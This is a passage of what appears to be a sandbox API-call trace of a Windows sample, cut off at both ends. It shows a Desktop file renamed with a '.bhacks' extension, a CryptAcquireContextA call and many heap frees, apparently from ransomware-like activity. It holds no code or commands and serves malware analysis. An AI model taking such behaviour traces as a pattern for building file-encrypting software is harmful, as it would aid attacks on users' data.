RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0106.734] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.734] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.734] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.734] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/W3nCKPmZd6_T8yGD3CRn.jpg.bhacks", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x241cd0f6, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x241cd0f6, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2421963f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x3450, dwReserved0=0x0, dwReserved1=0x0, cFileName="W3nCKPmZd6_T8yGD3CRn.jpg.bhacks", cAlternateFileName="W3NCKP~1.BHA")) returned 0x9a3b80 [0106.734] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0106.734] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0106.734] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0106.734] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0106.735] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0106.735] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0106.735] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0106.735] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0106.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0106.735] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0106.735] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0106.735] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0106.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7020, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0106.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0106.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7060, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0106.735] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf440) returned 1 [0106.736] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0106.736] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0106.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0106.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0106.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0106.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0106.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0106.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0106.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0106.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73fb0 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0106.738] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0106.738] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0106.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73c50 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0106.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0106.740] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.740] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0106.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0106.741] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0106.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0106.742] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0106.742] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0106.742] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a748f8 | out: hHeap=0x2af0000) returned 1 [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0106.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0106.743] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0106.743] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, 